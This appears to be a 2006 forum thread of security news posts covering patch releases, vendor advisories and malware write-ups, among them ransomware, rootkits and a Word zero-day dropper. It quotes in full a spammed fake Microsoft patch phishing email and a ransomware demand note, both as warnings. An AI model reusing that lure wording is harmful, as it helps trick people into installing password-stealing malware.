The latest updates have just become available and were successfully installed on my laptop and desktop at work. These include security updates for Windows, Internet Explorer and Office and should be applied by individual users or companies as quickly as possible.
http://www.microsoft.com/technet/security/Bulletin/ms06-Apr.mspx
-
April 13, 2006 at 8:41 am #3103540
Avarta.A – First Microsoft Publisher Virus appears
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
Kaspersky has noted the 1st MS/Publisher virus to appear in the wild. PUB file extensions will most likely be necessary to include in scanning routines.
Avarta.A – First Microsoft Publisher Virus appears
http://www.viruslist.com/en/viruses/encyclopedia?virusid=117864This is the first known virus that infects MS Publisher (*.pub) documents. It is a very simple overwriting virus, written in Visual Basic for Applications (VBA). The virus uses a rather crude replication method – it searches for Publisher documents and copies itself over them, thus destroying their content. Avarta gets the location which it will scan for Publisher documents to infect by opening the registry and fetching the key for the recently used files in Publisher. It sets the macro Security Level in Publisher to Low. This is a common technique in macro viruses.
-
April 13, 2006 at 8:09 pm #3105667
Firefox 1.0.5.2 – New version with security updates
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
A new version of Firefox is now available. Current users who have autoupdate capabilities will most likely be automatically prompted for updates. More links are noted below: Product Page http://www.mozilla.com/firefox/ Release Notes http://www.mozilla.com/firefox/releases/1.5.0.2.html Security Enhancements http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox1.5.0.2
-
April 14, 2006 at 9:26 am #3105541
Microsoft Update – A more complete approach than Windows Update
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
It was an interesting coincidence that F-Secure is commenting on the new Microsoft Update approach, as I used this approach for the 1st time on April 11th on some of my home and office PCs. Microsoft Update is essentially Windows Update plus Office Update plus perhaps other products that might be found during the more comprehensive checking performed by this facility. The Microsoft Update process worked well in my own testing of it and it applied all Windows and Office related updates properly. As noted by F-Secure, you must be at least Office XP to use this facility.
F-Secure article: Forget about Windows update (use Microsoft update instead)
http://www.f-secure.com/weblog/archives/archive-042006.html#00000854Microsoft Update Link
http://update.microsoft.com/microsoftupdate/ -
April 19, 2006 at 7:00 pm #3287459
ISC Article — Banks use non-secure login forms
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
The ISC published a good finding this afternoon. This is good advice that extends beyond just banks. ALL ORGANIZATIONS requesting info should use SSL and other secure server techniques.
ISC Article — Banks use non-ssl login forms
http://www.incidents.org/diary.php?storyid=1277SecureWebBank.com – SSL Login Page Status
https://www.securewebbank.com/loginssluse.html -
April 21, 2006 at 8:36 am #3285157
Microsoft Releases SQL Server 2005 Service Pack 1
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
Microsoft released Service Pack 1 for SQL-Server on April 19 with functionality improvements for it’s latest version of SQL-Server.
SQL Server 2005 Service Pack 1 – Home Page
http://www.microsoft.com/sql/sp1.mspxMicrosoft Releases SQL Server 2005 Service Pack 1 – Press Release
http://www.microsoft.com/presspass/press/2006/apr06/04-19SQLExpands06PR.mspxSQL Server 2005 SP1 Arrives with Production-Ready Mirroring
http://www.eweek.com/article2/0,1759,1951914,00.aspQUOTE: Microsoft on April 19 introduced Service Pack 1 for SQL Server 2005, the server’s first major update since its launch Nov. 7, 2005. SP1 encompasses several new features besides database mirroring, including SQL Server Management Studio Express and additional, flexible options for independent software vendors.
The SP1 release is the first result of a new SQL Server “customer-collaboration model” Microsoft has instituted, which uses customer feedback as the company formulates feature and security updates.
Key new features include the production-ready version of database mirroring, in which the primary production server is mirrored at all times by a standby server. “This allows for automated, seamless failover between primary and standby server, if the primary server needs to come down,” SQL Server Senior Product Manager Carol Dullmeyer told eWEEK. “It’s a really critical feature.”
Microsoft sketches out it DB roadmap
http://www.eweek.com/article2/0,1895,1947288,00.asp -
April 21, 2006 at 8:48 am #3285148
Microsoft will address MS06-015 issues for affected customers
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
If the April updates are working well, there is no need to reinstall the MS06-015 security update. As a limited number of users were impacted, Microsoft is addressing this with a release. This can be found as follows:
MSRC Blog Posting – This is Great site to bookmark for Patch news & info
http://blogs.technet.com/msrc/archive/2006/04/21/425838.aspxWhen the update is re-released, it’s going to be very much targeted to people who are having the problem, or people who have not installed MS06-015 yet. That means if you have already installed MS06-015 and are not having the problem, there’s no action here for you.
-
May 8, 2006 at 8:57 am #3162444
Oracle Export Extensions – Public Exploit Code for Unpatched Vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All Oracle IT professionals and DBAs should be careful with export functions and file extensions in processing files, as noted by the CERT advisory below:
Oracle Export Extensions – Public Exploit Code for Unpatched Vulnerability
http://www.us-cert.gov/current/current_activity.html#unpatorcleQUOTE: US-CERT is aware of publicly available, working exploit code for an unpatched vulnerability in Oracle Export Extensions. Successful exploitation may allow a remote attacker with some authentication credentials to execute arbitrary SQL statements with elevated privileges. This may allow an attacker to access and modify sensitive information within an Oracle database.
More information about this vulnerability can be found in the following:
- Vulnerability Note: VU#932124
- Secunia Advisory: SA19860
- Security Focus: Oracle Vulnerability Report
- Red Database Security: Oracle Exploit Report
US-CERT recommends the following actions to mitigate the security risks:
- Restrict access to Oracle:
Only known and trusted users should be granted access to Oracle. Additionally, user accounts should be granted only those privileges needed to perform necessary tasks.
- Change login credentials for default Oracle accounts:
Oracle creates numerous default accounts when it is installed. Upon installation, accounts that are not needed should be disabled and the login credentials for needed accounts should be changed
-
May 22, 2006 at 2:03 pm #3151370
Acunetix – New company provides several Website security articles
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new company provides web protection services has a number of informative articles related to web security.
http://www.acunetix.com/Websitesecurity/
Learn more about web attacks:
- SQL injection
- Cross Site Scripting
- CRLF Injection
- Directory Traversal
- Authentication Hacking
- Google Hacking
Security Articles:
QUOTE: Start-up Acunetix protects Web sites against unauthorized modifications and denial-of-service attacks. The company announced its Web Vulnerability Scanner last July as a tool for identifying vulnerabilities before they can be exploited. Acunetix also recently announced a useful site for anyone interested in security Web sites (as usual, I have no relationship whatsoever with the vendor)
-
May 22, 2006 at 2:03 pm #3151366
F-Secure reports over 200 Mobile malware threats developed so far
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Malware developments continue for Mobile users and users
should continue to avoid unusual messages or any files offered to them in that
environment.F-Secure reports over 200 Mobile malware threats developed so
far
http://www.f-secure.com/weblog/archives/archive-042006.html#00000864QUOTE: In less than half a year our tally of mobile malware
has doubled to 200. Many of those in that count are variants of already detected
viruses, but the speed at which the number grows has real implications for all
those with unprotected smartphones. At the least, this is a testing ground. What
comes next? -
May 22, 2006 at 2:03 pm #3151367
Firefox 1.5.0.3 released to address DoS vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new DoS vulnerability was patched and all Firefox users should update to the latest version.
Firefox 1.5.0.3 released to address DoS vulnerability
http://www.mozilla.com/firefox/releases/1.5.0.3.html
http://www.incidents.org/diary.php?storyid=1307
http://secunia.com/advisories/19802/
QUOTE: What’s New in Firefox 1.5.0.3 – Firefox 1.5.0.3 is a security update that is part of our ongoing program to provide a safe Internet experience for our customers. We recommend that all users upgrade to this latest version. Security fix for denial of service vulnerability. Release Date: May 2, 2006
-
May 22, 2006 at 2:03 pm #3151368
Kittykat – New RAR virus threat
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Users should be cautious with all RAR files processed in email or shared by other sources.
Kittykat – New RAR virus threat
http://secunia.com/virus_information/28958/kittykat/
http://www.sarc.com/avcenter/venc/data/w32.kittykat.htmlW32.Kittykat is a virus that splits itself into many parts, and adds these parts to all RAR archive files in the current directory and the parent directory. The virus may arrive as an archive file. The virus requires that the archive is extracted with the full directory structure, and that the file start.bat is then executed.
When W32.Kittykat is executed, it performs the following actions:
1. Reconstructs itself as the following file: [RANDOM FILENAME].exe
2. Displays a message to announce its presence.
3. Searches for files to infect. The virus has no infection marker, so an already infected RAR archive file in the current or parent directory will be infected repeatedly. -
May 22, 2006 at 2:03 pm #3151369
Microsoft Security bulletins – May 2006
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All Windows users should apply these updates promptly to ensure their PCs are properly protected.
Microsoft Security bulletins – May 2006
http://www.microsoft.com/technet/security/Bulletin/ms06-May.mspxCritical — Vulnerability in Microsoft Exchange Could Allow Remote Code Execution (916803)
http://www.microsoft.com/technet/security/Bulletin/ms06-019.mspxCritical — Vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (913433)
http://www.microsoft.com/technet/security/Bulletin/ms06-020.mspxModerate — Vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580)
http://www.microsoft.com/technet/security/Bulletin/ms06-018.mspx -
May 22, 2006 at 2:03 pm #3151361
Sophos Anti-Virus products – Critical vulnerability in scanning CAB files
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Critical vulnerability in Sophos Anti-Virus products
http://www.incidents.org/diary.php?storyid=1325Advisory: Crafted Microsoft CAB file can allow arbitrary code to be run
http://www.sophos.com/support/knowledgebase/article/4934.htmlQUOTE: A vulnerability has been discovered in Sophos’s unpacking of Microsoft Cabinet files, whereby a Microsoft Cabinet (CAB) file could be deliberately crafted to allow an attacker to execute arbitrary code on a vulnerable installation of Sophos Anti-Virus. Although theoretically a risk, Sophos has not seen any examples of malware attempting to employ this vulnerability.
-
May 22, 2006 at 2:03 pm #3151362
Linux Security – The illusion of invulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All environments must be properly protected, as security is a “process” of staying up-to-date, monitoring risks, and following best protective practices.
The illusion of invulnerability (see May 9th)
http://www.viruslist.com/en/weblog?calendar=2006-05QUOTE: On Saturday “Linuxtag 2006” closed in Wiesbaden (Germany). According to the organisers, it?s Europe’s
biggest Linux Expo. At the Kaspersky stand we talked to a lot of visitors. Pretty soon, it dawned on us exactly what the biggest threat to Linux systems is: the almost overwhelming belief in the invulnerability of Linux.Nearly every visitor accepts the need to protect Windows against malicious code (although even at a Linux fair you find people believing that a firewall is all you need to keep viruses and worms away). But many people we spoke to were unable to think of Linux as potentially vulnerable; after all, they argued, a Linux user would never go online with root rights as typical Windows XP home users do. But such thinking overlooks some important facts:
– You don?t need to have root privileges to delete a user?s home directory of a user or access his personal data – you only need to run malicious code with user privileges. (And not every user makes daily backups which could mitigate the potential damage.)
– The number of new malicious programs for an operating system isn?t related to the number of known security flaws, but to the number of installations. In Germany, the number of Linux distributions installed is growing rapidly, and overall, the number of malicious programs for Linux more than doubled between 2004 and 2005).
*Nix Malware Doubles
http://www.viruslist.com/en/analysis?pubid=184625030– To access a system, a virus writer doesn?t need 300 vulnerabilities – one is enough.
– Vulnerabilities exist prior to their being identified by the developers who report them. Virus writers actively search for vulnerabilities, but keep their discoveries to themselves.
– Only a perfect system can offer perfect security. In his “Areas for Improvement in the 2.6 Kernel Development Process” Andrew Morton (lead maintainer of the Linux production kernel) pointed out that the number of new bugs in the current 2.6 kernel are causing concern, and might lead to the development process being halted until existing problems are fixed.
-
May 22, 2006 at 2:03 pm #3151363
Older OS may have caused Florida theater chain to be hit by virus
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
It’s important to always stay up-to-date on the latest security patches and Operating System versions.
Florida theater chain hit by virus attack
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9000400QUOTE: Attackers may have had an easier time cracking the Muvico.com Web server because it is running Windows 2000, said Rich Miller, an analyst at Web tracking company Netcraft Ltd. Windows 2000 is an older version of Microsoft Corp.’s operating system, and it has been the subject of frequent widespread attacks, including last year’s Zotob virus. “Microsoft still supports Windows 2000 to the extent that if you’re current, you should be well-protected. But it is less secure than Windows Server 2003,” Miller said. Still, there remain a “substantial number of Web sites that continue to run on Windows 2000,” he said.
-
May 22, 2006 at 2:03 pm #3151364
Hoots – Network worm that could impact printing
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus is low-risk so far and spreads via unsecured network shares. It also prints a graphical image on network printers that could impact paper and bandwidth consumptions
Hoots – Network worm that could impact printing
http://vil.mcafeesecurity.com/vil/content/v_139471.htm.http://secunia.com/virus_information/29007/hoots/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FHOOTS%2EA
-
May 22, 2006 at 2:03 pm #3151365
Apple QuickTime Vulnerabilities – Update to v7.1
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All users of Apple’s Quicktime video facility should update to 7.1
Apple QuickTime Vulnerabilities – Update to v7.1
http://www.us-cert.gov/cas/techalerts/TA06-132B.htmlApple QuickTime contains multiple vulnerabilities. Exploitation of these vulnerabilities could allow a remote attacker to execute arbitrary code or cause a denial-of-service condition. An attacker may be able to exploit this vulnerability by persuading a user to access a specially crafted file with a web browser. Disabling QuickTime in your web browser will defend against this attack vector.
-
May 22, 2006 at 2:04 pm #3151357
Internet Poker — New Rootkit Dangers
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
F-Secure has documented a new risk associated for on-line poker players, where a rootkit could have been potentially distributed to users
Internet Poker — New Rootkit Dangers
http://www.f-secure.com/weblog/archives/archive-052006.html#00000881
http://www.f-secure.com/weblog/archives/archive-052006.html#00000878
http://www.f-secure.com/v-descs/small_la.shtml
http://securityresponse.symantec.com/avcenter/venc/data/trojan.checkraise.htmlRBCalc.exe was a malicious software program present on the “Check Raised” website for a period of time. This site provides tools, articles and other various applications to online poker players. As a result, many online poker players could have been affected by this targeted attack. Trojan.Checkraise is a Trojan horse that steals passwords for popular online poker Web sites. It also opens a back door on the compromised computer and logs keystrokes. It sends confidential information to a remote attacker
Question: So a question for all you poker fanatics; when is this not a winning hand?
Answer: When your online poker login credentials have been stolen and your
account drained. We have received no reports of this happening, but
the possibility is definitely there. -
May 22, 2006 at 2:04 pm #3151358
Article: If you bank online — you and your money are targets
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Summary of key recommendations offered in the article:
1. Never click on URLs found in email
2. Call the bank directly if you are unsure of an email message
3. Keep AV and Firewall protection as up-to-date as possible
4. Go directly to your bank’s site through your web browser
5. Notify the bank ASAP if you become a victum of phishing and follow all proceduresArticle: If you bank online — you and your money are targets
http://www.marketwatch.com/News/Story/4dpBNJKhD0VdlTbl2QT7HwbQUOTE: There could be a hyperlink in the body of an e-mail that you think is your bank’s. An e-mail could contain a malicious program that follows your key strokes until you key in your bank password. Or, a weak system link may let a similar bug take advantage of your computer’s ability to store Web addresses you frequently visit. When a familiar Web address automatically appears in the URL box, you’re redirected to an imposter site seeking personal information.
An estimated $940 million was lost by consumers through phishing in 2005, says Gartner Inc., Stamford, Conn. Average loss per phishing case: $7,294, says Javelin Strategy & Research, Pleasanton, Calif
-
May 22, 2006 at 2:04 pm #3151359
MDropper Trojan – Exploits Zero Day vulnerability in MS Word
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This is rated low-risk everywhere and it’s not widespread — still folks should be careful with suspicious Word documents.
MDropper Trojan – Exploits Zero Day vulnerability in MS Word
http://vil.mcafeesecurity.com/vil/content/v_139539.htm
http://www.sarc.com/avcenter/venc/data/trojan.mdropper.h.html
http://secunia.com/virus_information/29277/mdropper.h/
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.ginwui.htmlTrojan.Mdropper.H is a Trojan horse that downloads other risks onto the compromised computer. This Trojan exploits a 0 day Microsoft Word vulnerability to drop Backdoor.Ginwui.
-
May 22, 2006 at 2:04 pm #3151360
GINWUI.B – New payload variant from MDropper based on 0Day Word Exploit
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Users should be careful with any spam email containing Word documents, as the vulnerability also automatic downloads of the GINWUI backdoor onto the system. A brand new variant of the backdoor component has just emerged and other variants may follow.
GINWUI.B – New payload variant from MDropper based on 0Day Word Exploit
http://secunia.com/virus_information/29302/ginwui.b/
http://secunia.com/virus_information/29299/bkdrginwui.b/
http://secunia.com/virus_information/29290/w97mmdropper.ab/QUOTE: This backdoor arrives on a system as a file dropped by another malware that Trend Micro detects as W97M_MDROPPER.AC. When executed, it drops the files ZSYHIDE.DLL and ZSYDLL.DLL in the Windows system folder. This backdoor injects the said .DLL files, which are also detected as BKDR_GINWUI.B, into running processes to ensure memory residency and to hide its process, hence avoiding easy detection. Notably, it injects ZSYDLL.DLL into the Internet Explorer process. The said action causes the Internet Explorer to crash. Using TCP port 80, this backdoor attempts to access a remote server in scfzf.{BLOCKED}cp.net via Hyper Text Transfer Protocol (HTTP). It then listens for commands coming from a remote malicious user. It executes these commands locally on an infected system, providing the remote user virtual control over the system. The said routine compromises system security. This backdoor employs its rootkit capability in order to hide its files, process, and registry entry from an affected user, thus avoiding easy detection. In addition, it attempts to access a certain Web site.
-
May 23, 2006 at 6:00 am #3147090
Identity Theft impacts 26.5 million Veterans
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
A serious lapse in security has led to the theft of sensitive and confidential information for over 26.5 million Veterans.
Identity Theft impacts 26.5 million Veterans
http://seattletimes.nwsource.com/html/nationworld/2003012577_datatheft23.htmlThe burglary occurred May 3 in Wheaton, Md., according to a source with knowledge of the incident who requested anonymity because the matter is under investigation. A career data analyst, who was not authorized to take the information home, has been put on administrative leave pending the outcome of investigations by the FBI, local police and inspector general of the VA, Nicholson said. He would not identify the employee by name or title.
“They believe this was a random burglary and not targeted at this data,” Nicholson said. “There have been a series of burglaries in that community. … There is no indication at all that any use is being made of this data or even that they know that they have it.”
Guarding against identity theft
The Veterans Affairs Department says it is not necessary for veterans to contact financial institutions or cancel credit cards and bank accounts in case of identity theft. Here is what veterans can do to protect themselves:
Be vigilant. Carefully monitor bank and credit-card statements. Report unusual activity immediately to the financial institution involved and contact the Federal Trade Commission.
If you detect suspicious or unusual activity, do the following:
? Contact the fraud department of one of the three major credit bureaus:
? Close any account that has been tampered with or opened fraudulently.
? File a report with your local police department or the police department in the community where the identity theft took place.
? File a complaint with the Federal Trade Commission by using its identity-theft hotline at 877-438-4338, online at http://www.consumer.gov/idtheft, or by mail at Identity Theft Clearinghouse, Federal Trade Commission, 600 Pennsylvania Ave. NW, Washington, D.C. 20580.
Source: Veterans Affairs
-
May 24, 2006 at 4:06 pm #3147313
New Word Security Vulnerability and Limited Zero Day Exploit
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Some recent updates related to the new Word vulnerabilities and very limited Zero Day exploit that has been crafted. Here’s hoping things stay quite on the malware side until Microsoft develops a patch for this new vulnerability.
MSRC Blog entry
http://blogs.technet.com/msrc/archive/2006/05/23/429904.aspxCritical Advisory on new Word Vulnerability
http://secunia.com/advisories/20153/Microsoft Advisory
http://www.microsoft.com/technet/security/advisory/919637.mspx -
May 24, 2006 at 8:06 pm #3147252
Windows Vista – Guidelines for purchasing a PC now that can run this new OS
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
http://www.microsoft.com/technet/windowsvista/evaluate/hardware/vistarpc.mspx
Computers with the Windows Vista Capable PC logo will meet or exceed the requirements to deliver the core Windows Vista experiences such as innovations in security, reliability, organizing and finding information. They can also deliver key business features found in the Windows Vista Business and Windows Vista Enterprise versions, such as domain join.
-
May 25, 2006 at 8:06 pm #3156811
Banwarum Worm – Offers Tickets for the WORLD CUP?
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
There are no free lunches or World Cup tickets available by email offers of this type. The text of the message is in German and this new worm exploits vulnerabilities in MS04-007. Users should be cautious with all email messages.
Banwarum Worm – Offers Tickets for the WORLD CUP?
http://www.f-secure.com/weblog/archives/archive-052006.html#00000885
http://secunia.com/virus_information/29439/banwarum/
http://secunia.com/virus_information/29440/banwarum.dll/
http://secunia.com/virus_information/29438/ranchneg.a/Diagram of worm behavior
http://www.trendmicro.com/vinfo/images/WORM_RANCHNEG_A_BD.gifW32.Banwarum@mm is a mass-mailing worm that uses its own SMTP engine to send an email to addresses that it gathers from the compromised computer. The worm also spreads through the network by exploiting the Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability (as described in Microsoft Security Bulletin MS04-007). The worm also opens a back door via HTTP access.
-
May 27, 2006 at 12:06 pm #3158196
Corporate Symantec Anti-Virus Client vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Symantec is working on a solution for an elevation of privileges that could occur with corporate clients. The retail versions (e.g., NAV 2006) are not impacted by this issue. Users should be cautious in email and website visitations until this issue is resolved.
Corporate Symantec Anti-Virus Client vulnerability
http://www.symantec.com/avcenter/security/Content/2006.05.25.htmlInternet Storm Center Information
http://www.incidents.org/diary.php?storyid=1364PRODUCTS IMPACTED
Symantec Client Security 3.1 a
Symantec Antivirus Corporate Edition 10.1As best practice, Symantec strongly recommends the following:
* Restrict access to administration or management systems to privileged users only, with additional restricted access to the physical host system(s) if possible.
* Keep all operating systems and applications updated with the latest vendor patches.
* Follow a multi-layered approach to security. Run both firewall and antivirus applications, at a minimum to provide multiple points of detection and protection to both inbound and outbound threats.
* Be cautious visiting unknown or untrusted websites or following unknown URL links.
* Do not open attachments or executables from unknown sources or that you didn’t request or were unaware of. Always err on the side of caution. Even if the sender is known, the source address may be spoofed.
-
May 30, 2006 at 10:37 am #3156608
PWS-WinPatch – Fake MS Patch being Spammed
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
A new email threat has surfaced which contains a hostile URL that will download a password stealer agent. The email is spoofed to appear like it comes from Microsoft, however the company does not distribute updates in this manner. To stay safe, users should delete all copies of this without clicking on the URL in the email.
PWS-WinPatch – Fake MS Patch being Spammed
http://www.incidents.org/diary.php?storyid=1370
http://www.sophos.com/virusinfo/analyses/trojbeastpwsc.html
http://vil.mcafeesecurity.com/vil/content/v_139619.htmCOPY OF THE NEW TROJAN HORSE ATTACK BEING SPAMMED
From: Microsoft
Sent: Monday, 29 May 2006 7:16 AM
To: Victim
Subject: Microsoft WinLogon Service – Vulnerability IssueMicrosoft Coorporation
A new vulnerability has been discovered in the Microsoft WinLogon Service , that would allow an attacker to gain access to an unpached computer. Since your email is part of our private mail lists and your have succesfully registered your Microsoft Windows , you can download the patch to fix this vulnerability before others do.
Please click the link below to download the patch and protect your computer against WinLogon attacks :
<<URL REMOVED>>
You are free to share this with all your friends and relatives that are using Microsoft Windows Operating System
Thank you
Microsoft Coorp.
-
May 31, 2006 at 10:39 am #3157722
Lecna.A — Network Walker uses Rootkit approach
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus spreads through non-secure network shares in a similar manner as the LovGate series. It also includes a backdoor to further compromise security, along with rootkit techniques to better hide it’s presence from AV software.
Lecna.A — Network Walker uses Rootkit approach
http://secunia.com/virus_information/29583/lecna.a/
http://www.sarc.com/avcenter/venc/data/w32.lecna.a.htmlW32.Lecna.A is a worm that spreads through network shares by exploiting vulnerabilities. The worm opens a back door to allow a remote attacker to have unauthorized access to the compromised computer. It uses rootkit technology to hide its presence and may attempt to download malicious files from the Internet.
-
May 31, 2006 at 10:40 am #3157721
Stardust Macro Virus – Designed to infect Open Office documents
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new macro virus is not a true threat to the Open Office environment yet, as it’s not in the wild currently. Still, all environments must be carefully watched to ensure the best safety practices are in place.
Stardust – New POC macro virus designed to infect Open Office documents
http://secunia.com/virus_information/29582/xmldustar.a/Stardust is a new proof-of-concept macro virus that affects StarOffice and OpenOffice (OO) Suites. This macro virus then proceeds to infect OO based document files. It is written in Star Basic. It affects systems running on Windows 98, ME, NT, 2000, XP, and Server 2003 with StarOffice/OpenOffice Suites installed.
-
June 3, 2006 at 6:26 am #3166165
Microsft Advisory 919637 – Updated Info on Word vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Microsoft has published additional info in their FAQ section for the Word vulnerability where some very limited zero day attacks have occurred. ETA for release will be during “Patch Tuesday” on June 13th
Microsoft Security Advisory (919637)
Vulnerability in Word Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/919637.mspxQUOTE: The security update is now being finalized through testing to ensure quality and application compatibility and is on schedule to be released as part of the June security updates on June 13, 2006, or sooner as warranted
-
June 3, 2006 at 6:26 am #3166166
Firefox & Thunderbird 1.0.5.4 – Security Release
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All current users should move to the latest versions to help stay safe from a security perspective.
What’s new in Firefox 1.0.5.4
http://www.mozillazine.org/talkback.html?article=8763
http://www.mozilla.com/firefox/releases/1.5.0.4.html
http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox1.5.0.4Thunderbird 1.0.5.4
http://www.mozillazine.org/talkback.html?article=8767
http://www.mozilla.com/thunderbird/releases/1.5.0.4.html
http://www.mozilla.org/projects/security/known-vulnerabilities.html#thunderbird1.5.0.4SeaMonkey 1.0.2
http://www.mozillazine.org/talkback.html?article=8761ISC Notification
http://www.incidents.org/diary.php?storyid=1377An easy method for Firefox users to check for and install new updates:
1. Find “Help” on menu bar
2. Click on “Check for Updates” -
June 5, 2006 at 2:27 pm #3164904
CBS Market Watch Article: Be Careful with EMAIL at work
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
CBS Market Watch Article: Be Careful with EMAIL at work
QUOTE: Almost one-third of companies said they’ve fired an employee in the last 12 months for violating e-mail policies and 52% of the companies said they have disciplined an employee for violating e-mail rules in the past year, according to a survey of 294 U.S. firms with 1,000 or more workers.
Thirty-eight percent of companies said they employ staff to read or analyze outgoing e-mail messages, and that jumps to 44% of companies with 20,000 or more employees, according to the survey, conducted by Forrester Consulting for Proofpoint Inc., which makes anti-spam and e-mail monitoring tools for companies. About half of the companies said they regularly audit outbound e-mail content.
“There are legitimate reasons for companies to monitor e-mail,” said Keith Crosley, director of market development at Proofpoint, in Cupertino, Calif. “There is so much risk associated with e-mail. The companies we’re talking abut here have records on many thousands of customers. You really need to protect that data. E-mail is one of the least secure systems,” he said. “It’s very easy to inadvertently reveal massive amounts of customer data.”The message to workers is “don’t put anything in e-mails that you wouldn’t want the whole world to read,” Crosley said. “That would be a difficult ideal to live up to,” he said, but, absent that, workers should at least abide by their company’s policy for acceptable e-mail use.
-
June 5, 2006 at 10:26 pm #3165441
Malware can hide in a 1×1 pixel
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
An excellent ISC article documents how malware can hide within a single dot (pixel) on the screen. All browsers should be kept update for security updates.
http://www.incidents.org/diary.php?storyid=1380
-
June 6, 2006 at 6:29 am #3165341
UNIX Downloader.A – New Virus manipulates WGET command
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus is low risk and not prevelant in the wilde. Although UNIX malware is rare, this new threat illustrates the need to protect all environments
UNIX Downloader.A – New Virus manipulates WGET command
This Unix malware arrives as a downloaded file from the Internet. Upon execution, it connects to the Internet using TCP port 8080. Once a connection is established, it utilizes the application Wget to download and execute ELF_LUPPER.F and ELF_KAITEN.AQ from specific URLs.
-
June 6, 2006 at 9:07 am #3165261
Kaspersky – Top 20 virus incidents for May 2006
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Kaspersky has publisehd their Top 20 virus incidents for May 2006. MyTob, Netsky, and LovGate variants were the primary leading virus malware reported.
Kaspersky – Overall Top 20
http://www.viruslist.com/en/viruses/analysis?pubid=187865529Top 20 based on Online Cleaner scans
http://www.viruslist.com/en/viruses/analysis?pubid=187865525 -
June 6, 2006 at 1:01 pm #3164459
GpCode.af Virus – uses RSA 330 bit encryption to hold user hostage
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
GpCode.af is a brand new virus variant that uses RSA 330 bit encryption to hold user hostage. As Kaspersky recommends infected users should not send email or payments to these malicious individuals to decrypt files.
KASPERSKY ESCALATES WARNING TO SEVERE RISK
http://www.viruslist.com/en/viruses/alerts?alertid=188171360
Kaspersky Lab has received reports of yet another variant of GpCode, the cyberblackmail virus- Virus.Win32.GpCode.af. This new variant is currently spreading on the Russian Internet. It encrypts user files; the author then demands money for decrypting the files.This latest variant differs from the one that appeared last Thursday in that it uses a more secure encryption algorithm – RSA 330 bit rather than the RSA 260 bit key the previous variant used.
Kaspersky Lab strongly recommends that anyone who has had files encrypted should contact the Virus Lab. Under no circumstances should users give in to blackmail, as this will encourage the authors of this program to create new versions.
TECHNICAL DETAILS of AE version (RSA 260 bit version)
http://www.viruslist.com/en/viruses/encyclopedia?virusid=123334This malicious program encrypts files on the victim machine. The virus itself is a Windows PE EXE file approximately 62KB in size, packed using UPX. The unpacked file is approximately 134KB in size. This program was spammed throughout the Russian Internet. Once launched, the virus will encrypt files which it finds on the victim machine.
Once encrypted, files cannot be used. The author of the program then demands money to decrypt the encrypted files. A file called ‘readme.txt’ is created in folders where encrypted files are located. The file contains the following text
Some files are coded by RSA method.
To buy decoder mail: ***** @ mail . ru
with subject: REPLYThe email address shown may differ from modification to modification of this virus. If contacted by the user, the author of the program will demand payment for decrypting the encrypted files.
KASPERSKY WEBLOG ENTRIES
http://www.viruslist.com/en/weblog?weblogid=188229974
